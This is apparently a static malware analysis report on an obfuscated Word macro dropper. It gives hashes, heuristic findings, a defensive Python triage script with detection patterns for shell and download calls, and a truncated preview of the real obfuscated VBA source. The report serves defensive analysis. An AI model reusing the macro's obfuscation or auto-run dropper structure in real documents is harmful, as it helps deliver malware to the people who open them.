Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1378a18e2ace8505…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 217.5 KB
Created: 2018-02-26 11:26:00
Authoring application: Microsoft Office Word
First seen: 2019-04-17
MD5: 2e9d41fc03ac7a76ca69ee8b6c59b080
SHA-1: f8c7a9f0c35dbe2ede01f646576cce6de847ce2e
SHA-256: 1378a18e2ace8505893b3d9387a03caa2901abb1d7a2484612722901ac72c517
Risk Score: 204

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a malicious Word document (OLE container) carrying a VBA project. The decoded macro source calls Shell(), which launches an external program or command line from within the Word process; in a dropper this is the step that runs the downloaded or decoded second stage. An AutoOpen procedure is also present, so the macro runs as soon as the document is opened with macros enabled, with no further user interaction after the enable prompt. The extracted source is heavily obfuscated: random identifier names, dead arithmetic and Tan()/CBool() expressions guarded by On Error Resume Next, and a string-decoding helper (gjHBjhbyuf) applied to many string constants. This is consistent with the ClamAV Doc.Dropper classification.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6457236-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6457236-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The macro source calls Shell(), which launches an external program or command line from the document. In a dropper this is the step that executes the downloaded or decoded payload.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    An AutoOpen procedure is present. Word runs it automatically when the document is opened with macros enabled, so execution needs no user action beyond the macro-enable prompt.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this canned description conflicts with the Extracted artifacts section below, where olevba did recover and decode a full VBA project; for this sample, treat the marker as corroboration of the AutoOpen finding rather than as an independent detection.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI that Word writes into any document containing drawing content. It is document plumbing, not a download or command-and-control location, and should not be used as an indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 59891 bytes
SHA-256: ce1af0cac04e04256c13fcedbeaafdc9a85303bc20d01ed016b6e91176ca3a60
Detection
ClamAV: No threats found (the signature hit above is on the OLE container, not on the decoded macro source)
Obfuscation or payload: likely
Carved artifact contains 25 long base64-like blob(s). Caveat: this check matches long runs of the base64 alphabet, and the preview below shows that the macro uses long random-looking string constants and identifiers that satisfy the same pattern, so some of the 25 blobs may be obfuscation material rather than encoded payload. Decode candidate blobs before reporting them as a payload; the "likely" rating reflects this uncertainty.
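The following is a minimal re-implementation of the kind of static triage that produces the findings above (auto-exec entry point, Shell()-style execution calls, long base64-like blobs, embedded URLs). It is an added example for this page, not the report's tooling and not oletools/olevba code. The VBA sample it scans is a constructed stand-in for an extracted macros.bas, and the keyword lists, the 40-character blob threshold and the schema-host allowlist are assumptions. Beyond what the report shows, it also checks whether each base64-like run actually decodes as well-formed base64, which separates encoded payload candidates from random-identifier obfuscation, and it labels URLs on known OOXML namespace hosts as document plumbing.

```python
"""Static triage of decoded VBA macro source.

Added example, not the report's tooling and not oletools/olevba code.
The VBA below is a constructed stand-in for an extracted macros.bas.
"""
import base64
import binascii
import re
from collections import Counter
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Assumed list of auto-execution entry points (Word and Excel procedure names).
AUTOEXEC_RE = re.compile(
    r"\b(?:Sub|Function)\s+(AutoOpen|AutoExec|AutoClose|AutoNew|AutoExit|"
    r"Auto_Open|Auto_Close|Document_Open|Document_Close|Document_New|"
    r"Workbook_Open|Workbook_Close|Workbook_Activate)\b", re.I)
# Assumed list of execution / download primitives worth counting.
EXEC_RE = re.compile(
    r"\b(WScript\.Shell|ShellExecute|Shell|CreateObject|GetObject|CallByName|"
    r"URLDownloadToFile|XMLHTTP|ADODB\.Stream)\b", re.I)
# Runs of at least 40 base64-alphabet characters; the threshold is an assumption.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/=])")
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
# Hosts of ordinary OOXML namespace URIs: expected plumbing, not payload hosts (assumed allowlist).
SCHEMA_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org", "purl.org"}


@dataclass
class Triage:
    autoexec: list = field(default_factory=list)
    exec_calls: dict = field(default_factory=dict)  # lower-cased name -> count
    b64_blobs: int = 0
    b64_decodable: int = 0
    urls: list = field(default_factory=list)        # (url, "schema-namespace" | "external")
    findings: list = field(default_factory=list)    # (severity, rule_id, text)


def classify_url(url: str) -> str:
    host = (urlparse(url).hostname or "").lower()
    return "schema-namespace" if host in SCHEMA_HOSTS else "external"


def decodes_as_base64(blob: str) -> bool:
    """True only if the run is well-formed base64 (alphabet, length and padding)."""
    try:
        base64.b64decode(blob, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def triage_vba(src: str) -> Triage:
    t = Triage()
    t.autoexec = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(src)})
    t.exec_calls = dict(Counter(m.group(1).lower() for m in EXEC_RE.finditer(src)))
    blobs = [m.group(0) for m in B64_RE.finditer(src)]
    t.b64_blobs = len(blobs)
    t.b64_decodable = sum(decodes_as_base64(b) for b in blobs)
    t.urls = [(u, classify_url(u)) for u in URL_RE.findall(src)]

    if src.strip():
        t.findings.append(("medium", "OLE_VBA_MACROS", "Document contains VBA macro code"))
    if "shell" in t.exec_calls or "wscript.shell" in t.exec_calls:
        t.findings.append(("critical", "OLE_VBA_SHELL", "Shell() call in VBA"))
    if t.autoexec:
        t.findings.append(("high", "OLE_VBA_AUTOOPEN",
                           "Auto-exec entry point(s): " + ", ".join(t.autoexec)))
    if t.b64_blobs:
        t.findings.append(("info", "EXTRACTED_FILE_STATIC_TRIAGE",
                           f"{t.b64_blobs} long base64-like blob(s), "
                           f"{t.b64_decodable} decode as well-formed base64"))
    for url, kind in t.urls:
        t.findings.append(("info", "EMBEDDED_URL", f"{url} ({kind})"))
    return t


# Constructed stand-in for an extracted macros.bas (not the real artifact).
# The encoded string is harmless text; the second constant is a random-identifier-style
# run that sits in the base64 alphabet but is not valid base64 (51 characters).
_BLOB = base64.b64encode(b"constructed stand-in payload, not real").decode()
_IDENT = "RVCuHXRBXDMUfvMKUKpzJJRCzzEWtPPPFAMGPP" + "a" * 13
SAMPLE_VBA = """Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    On Error Resume Next
    Dim p As String
    p = "__BLOB__"
    Shell Decode(p), vbHide
End Sub
Function Decode(s As String) As String
    Decode = Helper("__IDENT__", 10, 2)
End Function
' http://schemas.openxmlformats.org/drawingml/2006/main
""".replace("__BLOB__", _BLOB).replace("__IDENT__", _IDENT)


if __name__ == "__main__":
    for sev, rule, text in triage_vba(SAMPLE_VBA).findings:
        print(f"{sev:<8} {rule:<30} {text}")
```

On the constructed sample this reports one decodable blob and one that merely looks like base64, which is the distinction the "likely" rating above leaves open; on a real carved macros.bas the same check tells you which of the flagged runs are worth decoding further.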
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bpAzblidGvdi"
Sub iLPtKukvlk(slPvjGonACizs)
   On Error Resume Next
   Dim JTiiV()
   ReDim PdQZKwCjiFqpEK(2)
   pVmtA(0) = 1476304
   iaAMWrBaGMQma(1) = 2811424
   qklDIIuLs = Loo - 8896976
   zTwspUqZvqZ = 9762543 * 5232854
End Sub
Function rWaiOnwNz()
On Error Resume Next
kjjfH = "RVCuHXRBXDMUfvMKUKpzJJRCzzEW tPPPFAMGPP"
NauszUjcwMQ = WFTESDsCw = jXUpRlhBLnTw = (7414174 / nQmkIwihhp + 7788096 * ivNjYnrYY * (3967469 / tqGOmvAnZSoQC / 3114968 - Tan(tzGzpf / CBool(vGmni / 2758613 / FOGTWtuCksl))))
PLwQRbki = jCOEqfKQR = uSZiOsuzbwRmH = (3893082 / izjWM + 8303694 * NNJclrQ * (1352251 / OwkLvjoHBz / 551605 - Tan(tUuuuz / CBool(hiuEDh / 871395 / VlGDiUW))))
twAtlS = gjHBjhbyuf(kjjfH, 10, 2)
XWmbdtz = "wnjiwrlKjMzGYowod=%uVTtTDTKwYzBrpDqdrYiNOawhEtnMpI"
jIRAs = SwHBLTijt = wiHiFZYiEwauP = (7415848 / vsKLXvjowWjKj + 5958032 * vhaWwtDczbi * (3462259 / waYjUJPbUXWw / 3544462 - Tan(KMYOsDVCsUsow / CBool(PKksdtrVzwpXP / 1424840 / JDajzsQaMm))))
jpGpfbL = ORtiErjKX = JndTZCp = (2735186 / YUnObjQRIw + 9870748 * jXGObwmtFJMrvR * (4232454 / HGzDCwnRa / 672029 - Tan(znZYLYNa / CBool(XEzDCUWP / 1714544 / SJNqKBBwwkkonX))))
tVdJF = gjHBjhbyuf(XWmbdtz, 23, 13)
ZGawA = "pCOMptes&&YhjmkSlsSfjPDVTrTtammzChrWciwdwzSI"
pjPloKpQOnw = BApfJGiBj = jTCHm = (9606240 / HbRSlSQ + 6160848 * VJmKwXSjH * (7430552 / WwJioKPVHRf / 9265281 - Tan(XLJcjQhYz / CBool(kVPWFIBVzAOr / 1575859 / iiaCvYDq))))
GziOG = NNmkOqzrE = WKYNYoJ = (2367080 / vfwKfD + 8457967 * CpfdakuIBjVuK * (4157618 / vDUzsU / 1038348 - Tan(siSHKRDGhWvz / CBool(ZhwZi / 1040900 / EoRvaXAGL))))
FZEjJp = gjHBjhbyuf(ZGawA, 28, 12)
CEYoliQF = "dZofvIPlKtXdRXNEpiHCsijAorznAvw"
TuFlIH = MJtlLliFI = CzoWu = (7750241 / ndLwzCGTJEOdG + 8737499 * aooYSOj * (7358879 / cbfYSMnMPd / 626986 - Tan(JpMGn / CBool(CjQbCKnY / 9976749 / WViGrjTYWiA))))
aXMcGqJG = zRBOdqMRw = RfwiFLAZVl = (8817175 / FqtzwKZ + 4145497 * kFREPPNZUaHA * (1049193 / qhcmY / 3715691 - Tan(BwGkLLUdtCrdnj / CBool(iapvnzAKmL / 84473 / CRUYACojIKTE))))
APIDwDjnDIU = gjHBjhbyuf(CEYoliQF, 22, 1)
MFoAbVrnZ = "PQCitvmhVAhiOCWMMKponqPGMkZw=%cLOUirnqfwMmR"
TGoBzkvHzdn = rNTWYswrQ = ofWPnktJXtJR = (3489744 / jtqFrHNCFkUXSY + 227498 * wtLaqT * (7153247 / fUQEYkBZvXmf / 291861 - Tan(AJYlZluPSVIQu / CBool(GsEQICaW / 8165682 / iVjvbu))))
lVsWDhC = lWFGtBBFu = tPCvwHplSDSWWw = (3511802 / SPGEBzoXjl + 2123220 * WEqzVIJKTuMX * (6035212 / cYbPzGnQilwpwu / 5258644 - Tan(MKwBPNMTAN / CBool(HJYDjYEWPwUm / 832120 / FWFAj))))
oBdmkGHuMs = gjHBjhbyuf(MFoAbVrnZ, 5, 16)
tBcan = "wr3raiNahUzwMVSNSsizh"
FtstWSioW = YFhKjkjFl = APBYbSzlAwM = (3161450 / LOrrjtucQLCEcu + 2479521 * TJnzHIVTHiCXd * (1310189 / aIJWwotAMrGjEw / 3947392 - Tan(YmvjpYSoDsYjBq / CBool(wJQbvTYQC / 5025314 / bGAYRU))))
tVvkwj = mfiliaFCp = SDPJwVUH = (4909510 / WYfzVsGjwMni + 5332521 * wVMlQ * (6909888 / ZGwFNm / 3144841 - Tan(Flswdz / CBool(AiPpTZF / 5573774 / nbLNdJirpdz))))
wJoYOjAPq = gjHBjhbyuf(tBcan, 17, 3)
lvFftBWOVj = "pzQIqjjvIJPwVSzTNVYrjpaeh=%5rav%S"
UitsLodBP = jDqMUisli = rHfzWlJYNiROJN = (3248568 / iGmrjjvofo + 9488976 * kwnZdXhRo * (8530093 / wwwsWqU / 8906119 - Tan(wtwlwnPLLr / CBool(honnQvsl / 7357869 / zmprntlnZzK))))
lmpLjojV = uVZrABaqH = FwahKKKba = (9541259 / IvwHGuLudYm + 8804013 * nTNwQu * (3592372 / iKupPJcibLwAb / 7413713 - Tan(dkuHOwizT / CBool(SurwN / 2225751 / iodkCRrkiLC))))
SiMOo = gjHBjhbyuf(lvFftBWOVj, 2, 9)
ECEab = "sIwNG=%UBItzwGhVY"
jFSoizZM = oICjMlYJk = BtCHWiDdEwfAl = (9635374 / zdCziz + 2418254 * JFKNoBnCmtQU * (8749595 / EnuqSaUUn / 4448945 - Tan(ZMHWL / CBool(voGtCM / 3272889 / bRttHVd))))
cbHOAjuFV = QcZODnilS = RnIOoffamUfnd = (390935 / dbqJbajCbJ + 7066912 * IISQDnDkZIA * (7616192 / NSUAzdwXoaMn / 5536081 - Tan(OllhFDzXSUDcz / CBool(RBUaDWNILB / 5780600 / mKUiFcawozo))))
wawLnFuisRi = gjHBjhbyuf(ECEab,
... (truncated)